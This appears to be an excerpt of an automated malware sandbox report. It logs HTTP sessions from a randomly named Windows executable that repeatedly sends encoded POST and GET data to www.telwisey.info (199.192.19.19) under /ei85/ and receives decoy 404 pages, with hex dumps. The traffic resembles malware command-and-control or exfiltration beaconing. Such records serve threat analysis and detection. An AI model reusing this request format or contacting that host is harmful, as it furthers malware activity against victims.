                    Data Ascii: </g> </g> <g id="circlesBig"> <circle fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" cx="588.977" cy="255.978" r="7.952" />
                    Aug 12, 2024 05:15:42.288830042 CEST448INData Raw: 20 20 20 63 78 3d 22 32 38 33 2e 35 32 31 22 20 63 79 3d 22 35 36 38 2e 30 33 33 22 20 72 3d 22 37 2e 39 35 32 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72
                    Data Ascii: cx="283.521" cy="568.033" r="7.952" /> <circle fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" cx="413.618" cy="482.387" r="7.952" /> </g>
                    Aug 12, 2024 05:15:42.288849115 CEST1236INData Raw: 20 66 69 6c 6c 3d 22 23 30 45 30 36 32 30 22 20 63 78 3d 22 34 33 34 2e 38 32 34 22 20 63 79 3d 22 32 36 33 2e 39 33 31 22 20 72 3d 22 32 2e 36 35 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 66 69 6c
                    Data Ascii: fill="#0E0620" cx="434.824" cy="263.931" r="2.651" /> <circle fill="#0E0620" cx="183.708" cy="544.176" r="2.651" /> <circle fill="#0E0620" cx="382.515" cy="530.923" r="2.651" /> <circle fill="#0
                    Aug 12, 2024 05:15:42.288862944 CEST224INData Raw: 0a 09 09 09 43 33 36 30 2e 36 34 37 2c 34 35 31 2e 30 38 33 2c 33 34 39 2e 32 35 31 2c 34 35 37 2e 36 36 31 2c 33 33 38 2e 31 36 34 2c 34 35 34 2e 36 38 39 7a 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 67 20 69 64 3d 22 61 6e 74
                    Data Ascii: C360.647,451.083,349.251,457.661,338.164,454.689z" /> <g id="antenna"> <line fill="#FFFFFF" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-linejoin="round"
                    Aug 12, 2024 05:15:42.294327974 CEST1236INData Raw: 20 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3d 22 31 30 22 20 78 31 3d 22 33 32 33 2e 33 39 36 22 20 79 31 3d 22 32 33 36 2e 36 32 35 22 20 78 32 3d 22 32 39 35 2e 32 38 35 22 20 79 32 3d 22 33 35 33 2e 37 35 33 22 20 2f 3e 0a 20 20 20
                    Data Ascii: stroke-miterlimit="10" x1="323.396" y1="236.625" x2="295.285" y2="353.753" /> <circle fill="#FFFFFF" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-linejoin="round" stroke-miterlimit="10" cx=


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    22192.168.2.449761199.192.19.19802008C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exe
                    TimestampBytes transferredDirectionData
                    Aug 12, 2024 05:15:44.230930090 CEST791OUTPOST /ei85/ HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                    Accept-Language: en-us
                    Accept-Encoding: gzip, deflate, br
                    Host: www.telwisey.info
                    Origin: http://www.telwisey.info
                    Cache-Control: max-age=0
                    Connection: close
                    Content-Type: application/x-www-form-urlencoded
                    Content-Length: 221
                    Referer: http://www.telwisey.info/ei85/
                    User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                    Data Raw: 59 58 44 54 3d 44 54 4f 4b 63 69 51 79 6d 76 35 42 59 35 66 4e 68 49 4d 64 4d 73 2b 56 61 77 38 54 57 72 72 42 6e 68 36 64 61 4e 5a 67 72 64 63 4a 30 75 7a 2f 37 52 55 79 65 58 56 46 41 55 69 44 59 4a 78 39 43 45 79 56 30 5a 56 73 37 50 70 70 61 54 4b 77 45 63 35 4d 6b 43 70 4f 4a 41 7a 75 67 68 54 6e 6a 31 38 74 4d 67 30 71 59 68 31 31 70 78 4f 4d 4f 61 35 70 7a 32 36 50 66 4d 52 47 6c 59 42 57 4f 4b 4b 64 33 52 6e 51 66 76 6a 35 4d 43 76 57 6e 41 5a 6c 75 6f 30 35 76 68 57 4c 35 72 55 69 69 74 50 5a 67 6b 77 6b 77 35 41 4d 31 75 53 66 68 35 52 6a 45 2f 63 51 65 67 6b 4f 78 6c 43 6b 35 47 45 62 77 57 33 74 63 79 32 51 77 30 33 63 64 55 38 4d 51 42 59 3d
                    Data Ascii: YXDT=DTOKciQymv5BY5fNhIMdMs+Vaw8TWrrBnh6daNZgrdcJ0uz/7RUyeXVFAUiDYJx9CEyV0ZVs7PppaTKwEc5MkCpOJAzughTnj18tMg0qYh11pxOMOa5pz26PfMRGlYBWOKKd3RnQfvj5MCvWnAZluo05vhWL5rUiitPZgkwkw5AM1uSfh5RjE/cQegkOxlCk5GEbwW3tcy2Qw03cdU8MQBY=
                    Aug 12, 2024 05:15:44.838941097 CEST1236INHTTP/1.1 404 Not Found
                    Date: Mon, 12 Aug 2024 03:15:44 GMT
                    Server: Apache
                    Content-Length: 16026
                    Connection: close
                    Content-Type: text/html
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 [TRUNCATED]
                    Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <meta name="viewport" content="width=device-width, initial-scale=1"><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel='stylesheet' href='https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css'><link rel="stylesheet" href="/style.css"></head><body>... partial:index.partial.html --><div class="hamburger-menu"> <button class="burger" data-state="closed"> <span></span> <span></span> <span></span> </button></div><main> <div class="container"> <div class="row"> <div class="col-md-6 align-self-center"> <svg version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 0 800 600"> <g> <defs> <clipPath id="GlassClip"> <path d="M380.857,346.164c-1.247,4.6 [TRUNCATED]
                    Aug 12, 2024 05:15:44.838992119 CEST1236INData Raw: 73 2d 32 38 2e 34 38 35 2d 31 36 2e 35 39 39 2d 33 34 2e 38 37 37 2d 32 34 2e 31 39 32 63 2d 33 2e 31 30 31 2d 33 2e 36 38 34 2d 34 2e 31 37 37 2d 38 2e 36 36 2d 32 2e 39 33 2d 31 33 2e 33 31 31 6c 37 2e 34 35 33 2d 32 37 2e 37 39 38 63 30 2e 37
                    Data Ascii: s-28.485-16.599-34.877-24.192c-3.101-3.684-4.177-8.66-2.93-13.311l7.453-27.798c0.756-2.82,3.181-4.868,6.088-5.13 c6.755-0.61,20.546-0.608,41.785,5.087s33.181,12.591,38.725,16.498c2.387,1.682,3.461,4.668,2.705,7.488L380.857,346.
                    Aug 12, 2024 05:15:44.839025974 CEST1236INData Raw: 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 72 69 6e 67 53 68 61 64 6f 77 22 20 6f 70 61 63 69 74 79 3d 22 30 2e 35 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d
                    Data Ascii: <path id="ringShadow" opacity="0.5" fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" d="M483.985,127.43c23.462,1.531,52.515,2.436,83.972,2.436c36.069,0,68.978-1.19,93.922-3.149
                    Aug 12, 2024 05:15:44.839060068 CEST1236INData Raw: 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 33 22 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3d 22 72 6f 75 6e 64 22 20 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3d 22 31 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20
                    Data Ascii: 0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="320.135" y1="132.746" x2="320.135" y2="153.952" /> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" strok
                    Aug 12, 2024 05:15:44.839095116 CEST896INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 67 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 6e 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d
                    Data Ascii: </g> <g> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="489.555" y1="299.765" x2="489.555" y2="308.124" />
                    Aug 12, 2024 05:15:44.839128017 CEST1236INData Raw: 20 20 20 20 20 20 20 20 20 20 3c 6c 69 6e 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 33 22 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3d 22 72 6f 75 6e
                    Data Ascii: <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="244.032" y1="547.539" x2="244.032" y2="555.898" /> <line fill="none" stroke="#0E0620" stroke
                    Aug 12, 2024 05:15:44.839160919 CEST1236INData Raw: 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 67 20 69 64 3d 22 63 69 72 63 6c 65 73 42 69 67 22 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 69 72
                    Data Ascii: </g> </g> <g id="circlesBig"> <circle fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" cx="588.977" cy="255.978" r="7.952" />
                    Aug 12, 2024 05:15:44.839194059 CEST448INData Raw: 20 20 20 63 78 3d 22 32 38 33 2e 35 32 31 22 20 63 79 3d 22 35 36 38 2e 30 33 33 22 20 72 3d 22 37 2e 39 35 32 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72
                    Data Ascii: cx="283.521" cy="568.033" r="7.952" /> <circle fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" cx="413.618" cy="482.387" r="7.952" /> </g>
                    Aug 12, 2024 05:15:44.839226007 CEST1236INData Raw: 20 66 69 6c 6c 3d 22 23 30 45 30 36 32 30 22 20 63 78 3d 22 34 33 34 2e 38 32 34 22 20 63 79 3d 22 32 36 33 2e 39 33 31 22 20 72 3d 22 32 2e 36 35 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 66 69 6c
                    Data Ascii: fill="#0E0620" cx="434.824" cy="263.931" r="2.651" /> <circle fill="#0E0620" cx="183.708" cy="544.176" r="2.651" /> <circle fill="#0E0620" cx="382.515" cy="530.923" r="2.651" /> <circle fill="#0
                    Aug 12, 2024 05:15:44.839258909 CEST1236INData Raw: 0a 09 09 09 43 33 36 30 2e 36 34 37 2c 34 35 31 2e 30 38 33 2c 33 34 39 2e 32 35 31 2c 34 35 37 2e 36 36 31 2c 33 33 38 2e 31 36 34 2c 34 35 34 2e 36 38 39 7a 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 67 20 69 64 3d 22 61 6e 74
                    Data Ascii: C360.647,451.083,349.251,457.661,338.164,454.689z" /> <g id="antenna"> <line fill="#FFFFFF" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-linejoin="round" stroke-miterlimit=
                    Aug 12, 2024 05:15:44.850224972 CEST1236INData Raw: 38 31 37 2d 35 2e 38 31 38 2d 32 2e 34 38 34 2d 39 2e 30 34 36 0a 09 09 09 09 43 33 37 35 2e 36 32 35 2c 34 33 37 2e 33 35 35 2c 33 38 33 2e 30 38 37 2c 34 33 37 2e 39 37 33 2c 33 38 38 2e 37 36 32 2c 34 33 34 2e 36 37 37 7a 22 20 2f 3e 0a 20 20
                    Data Ascii: 817-5.818-2.484-9.046C375.625,437.355,383.087,437.973,388.762,434.677z" /> </g> <g id="armL"> <path fill="#FFFFFF" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-linejoin="roun


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    23192.168.2.449762199.192.19.19802008C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exe
                    TimestampBytes transferredDirectionData
                    Aug 12, 2024 05:15:46.760613918 CEST10873OUTPOST /ei85/ HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                    Accept-Language: en-us
                    Accept-Encoding: gzip, deflate, br
                    Host: www.telwisey.info
                    Origin: http://www.telwisey.info
                    Cache-Control: max-age=0
                    Connection: close
                    Content-Type: application/x-www-form-urlencoded
                    Content-Length: 10301
                    Referer: http://www.telwisey.info/ei85/
                    User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                    Data Raw: 59 58 44 54 3d 44 54 4f 4b 63 69 51 79 6d 76 35 42 59 35 66 4e 68 49 4d 64 4d 73 2b 56 61 77 38 54 57 72 72 42 6e 68 36 64 61 4e 5a 67 72 64 55 4a 30 37 76 2f 37 79 73 79 66 58 56 46 49 30 69 47 59 4a 78 61 43 45 71 52 30 5a 4a 53 37 4e 68 70 61 78 53 77 46 74 35 4d 74 43 70 4f 55 51 7a 6a 76 42 53 6a 6a 31 73 70 4d 6b 51 71 59 68 31 31 70 32 2b 4d 49 4f 6c 70 78 32 36 4d 49 38 52 4b 68 59 42 2b 4f 4b 53 4e 33 52 6a 71 66 2b 44 35 4d 69 2f 57 6c 32 46 6c 6e 6f 30 37 75 68 57 6c 35 72 52 79 69 74 54 37 67 6e 74 78 77 36 63 4d 6a 4a 54 30 37 71 35 72 5a 4d 30 2b 4f 6a 59 2f 32 58 53 63 38 47 4d 76 78 6a 6a 45 4c 6a 50 39 77 6b 32 6f 4a 57 56 4e 53 30 68 44 50 38 67 32 78 79 55 2b 76 74 74 30 74 70 53 50 71 7a 6c 44 68 36 6a 4d 4e 6e 35 55 47 4b 46 61 67 36 47 6b 5a 6d 35 57 52 72 78 72 64 41 6b 68 43 70 64 73 43 71 36 6e 58 4f 32 61 78 65 71 71 78 73 71 59 44 4f 79 78 45 6a 2b 61 37 62 75 51 35 6e 77 4a 31 65 6f 48 73 4c 59 51 62 32 31 30 2f 75 7a 6e 66 57 57 44 33 44 6f 66 51 4c 65 55 2f 63 38 73 77 [TRUNCATED]
                    Data Ascii: YXDT=DTOKciQymv5BY5fNhIMdMs+Vaw8TWrrBnh6daNZgrdUJ07v/7ysyfXVFI0iGYJxaCEqR0ZJS7NhpaxSwFt5MtCpOUQzjvBSjj1spMkQqYh11p2+MIOlpx26MI8RKhYB+OKSN3Rjqf+D5Mi/Wl2Flno07uhWl5rRyitT7gntxw6cMjJT07q5rZM0+OjY/2XSc8GMvxjjELjP9wk2oJWVNS0hDP8g2xyU+vtt0tpSPqzlDh6jMNn5UGKFag6GkZm5WRrxrdAkhCpdsCq6nXO2axeqqxsqYDOyxEj+a7buQ5nwJ1eoHsLYQb210/uznfWWD3DofQLeU/c8swQDQLMEHJPu8Oh9b3dVoL2iAc6qieDbFEMFpX/ZJ+HkqLtOHhiekgZsen4K+RIN6Pjr2+R0+dgEMjuyz+lAQY9Hxc95lAZhBLRw9TzSyy76CIvmeGl475JnpFhKg9pV48amtjJySGPr4BSFZxEvzEasOX6z8fdkJRXBgxweOu1pNj/sxb5vIU2uLF9AJJ6QSbjhlfC7ShdnfDp3mhd82PvuZm08IEJPS6EeihzjeGabvPmZgkG++LObAkDusr9oJswpqRKQHxOhHuUEIsOhLd9e7Kq+BUNwHTv72QjB1jCXCwEm787RW/04S0MhJtc6GoYykfsd8dC9FxGjygw5Y7VNDFDacN82rcUch34GOOB+H7nV2GD+vnnyA/cMam9LyY9v9ss/xoYbsxjjB/awRli6yx5y9nJ11vpDWB8dm2WqCczKAV0r/YuHPSlsUTriFl/eREK8rLOxeIHf8Q6jMiWrJruLqaQwT0z7LYoP6E1ntHpn/xS22MtLWVekCaridGquxvyfg1w863y0dD0aIgkSQ8ARKmIGEf3QkJSYv+YiUI6qTYNnsYAd8LAoIwOxiQwYFUb+WQEsX5fEdqfSVnIYMXntGnXY5aIsmQACpuzE8bJoUOBaI84kmkhwsK8806Art9bDLGFlgmJgZiRGxjXRNA0aQtessm4s [TRUNCATED]
                    Aug 12, 2024 05:15:47.365048885 CEST1236INHTTP/1.1 404 Not Found
                    Date: Mon, 12 Aug 2024 03:15:47 GMT
                    Server: Apache
                    Content-Length: 16026
                    Connection: close
                    Content-Type: text/html
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 [TRUNCATED]
                    Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <meta name="viewport" content="width=device-width, initial-scale=1"><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel='stylesheet' href='https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css'><link rel="stylesheet" href="/style.css"></head><body>... partial:index.partial.html --><div class="hamburger-menu"> <button class="burger" data-state="closed"> <span></span> <span></span> <span></span> </button></div><main> <div class="container"> <div class="row"> <div class="col-md-6 align-self-center"> <svg version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 0 800 600"> <g> <defs> <clipPath id="GlassClip"> <path d="M380.857,346.164c-1.247,4.6 [TRUNCATED]
                    Aug 12, 2024 05:15:47.365142107 CEST1236INData Raw: 73 2d 32 38 2e 34 38 35 2d 31 36 2e 35 39 39 2d 33 34 2e 38 37 37 2d 32 34 2e 31 39 32 63 2d 33 2e 31 30 31 2d 33 2e 36 38 34 2d 34 2e 31 37 37 2d 38 2e 36 36 2d 32 2e 39 33 2d 31 33 2e 33 31 31 6c 37 2e 34 35 33 2d 32 37 2e 37 39 38 63 30 2e 37
                    Data Ascii: s-28.485-16.599-34.877-24.192c-3.101-3.684-4.177-8.66-2.93-13.311l7.453-27.798c0.756-2.82,3.181-4.868,6.088-5.13 c6.755-0.61,20.546-0.608,41.785,5.087s33.181,12.591,38.725,16.498c2.387,1.682,3.461,4.668,2.705,7.488L380.857,346.
                    Aug 12, 2024 05:15:47.365179062 CEST1236INData Raw: 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 72 69 6e 67 53 68 61 64 6f 77 22 20 6f 70 61 63 69 74 79 3d 22 30 2e 35 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d
                    Data Ascii: <path id="ringShadow" opacity="0.5" fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" d="M483.985,127.43c23.462,1.531,52.515,2.436,83.972,2.436c36.069,0,68.978-1.19,93.922-3.149
                    Aug 12, 2024 05:15:47.365212917 CEST1236INData Raw: 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 33 22 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3d 22 72 6f 75 6e 64 22 20 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3d 22 31 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20
                    Data Ascii: 0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="320.135" y1="132.746" x2="320.135" y2="153.952" /> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" strok
                    Aug 12, 2024 05:15:47.365266085 CEST896INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 67 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 6e 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d
                    Data Ascii: </g> <g> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="489.555" y1="299.765" x2="489.555" y2="308.124" />
                    Aug 12, 2024 05:15:47.365299940 CEST1236INData Raw: 20 20 20 20 20 20 20 20 20 20 3c 6c 69 6e 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 33 22 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3d 22 72 6f 75 6e
                    Data Ascii: <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="244.032" y1="547.539" x2="244.032" y2="555.898" /> <line fill="none" stroke="#0E0620" stroke
                    Aug 12, 2024 05:15:47.365333080 CEST1236INData Raw: 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 67 20 69 64 3d 22 63 69 72 63 6c 65 73 42 69 67 22 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 69 72
                    Data Ascii: </g> </g> <g id="circlesBig"> <circle fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" cx="588.977" cy="255.978" r="7.952" />
                    Aug 12, 2024 05:15:47.365364075 CEST448INData Raw: 20 20 20 63 78 3d 22 32 38 33 2e 35 32 31 22 20 63 79 3d 22 35 36 38 2e 30 33 33 22 20 72 3d 22 37 2e 39 35 32 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72
                    Data Ascii: cx="283.521" cy="568.033" r="7.952" /> <circle fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" cx="413.618" cy="482.387" r="7.952" /> </g>
                    Aug 12, 2024 05:15:47.365401030 CEST1236INData Raw: 20 66 69 6c 6c 3d 22 23 30 45 30 36 32 30 22 20 63 78 3d 22 34 33 34 2e 38 32 34 22 20 63 79 3d 22 32 36 33 2e 39 33 31 22 20 72 3d 22 32 2e 36 35 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 66 69 6c
                    Data Ascii: fill="#0E0620" cx="434.824" cy="263.931" r="2.651" /> <circle fill="#0E0620" cx="183.708" cy="544.176" r="2.651" /> <circle fill="#0E0620" cx="382.515" cy="530.923" r="2.651" /> <circle fill="#0
                    Aug 12, 2024 05:15:47.365431070 CEST224INData Raw: 0a 09 09 09 43 33 36 30 2e 36 34 37 2c 34 35 31 2e 30 38 33 2c 33 34 39 2e 32 35 31 2c 34 35 37 2e 36 36 31 2c 33 33 38 2e 31 36 34 2c 34 35 34 2e 36 38 39 7a 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 67 20 69 64 3d 22 61 6e 74
                    Data Ascii: C360.647,451.083,349.251,457.661,338.164,454.689z" /> <g id="antenna"> <line fill="#FFFFFF" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-linejoin="round"
                    Aug 12, 2024 05:15:47.371001959 CEST1236INData Raw: 20 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3d 22 31 30 22 20 78 31 3d 22 33 32 33 2e 33 39 36 22 20 79 31 3d 22 32 33 36 2e 36 32 35 22 20 78 32 3d 22 32 39 35 2e 32 38 35 22 20 79 32 3d 22 33 35 33 2e 37 35 33 22 20 2f 3e 0a 20 20 20
                    Data Ascii: stroke-miterlimit="10" x1="323.396" y1="236.625" x2="295.285" y2="353.753" /> <circle fill="#FFFFFF" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-linejoin="round" stroke-miterlimit="10" cx=


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    24192.168.2.449763199.192.19.19802008C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exe
                    TimestampBytes transferredDirectionData
                    Aug 12, 2024 05:15:49.292229891 CEST501OUTGET /ei85/?YXDT=ORmqfURBt40sHMHMpa9bONKIG0NKJL7I9iieY9Aomdlbsbne+w1Kch9DF1irZ5FVSFO0rJB3/OJZWwrRbdUXnSdkLDuG3HSn8XcjXW0hCgpfinKrOJZMnTQ=&ZH3=yf1H3v6h HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                    Accept-Language: en-us
                    Host: www.telwisey.info
                    Connection: close
                    User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                    Aug 12, 2024 05:15:49.902158976 CEST1236INHTTP/1.1 404 Not Found
                    Date: Mon, 12 Aug 2024 03:15:49 GMT
                    Server: Apache
                    Content-Length: 16026
                    Connection: close
                    Content-Type: text/html; charset=utf-8
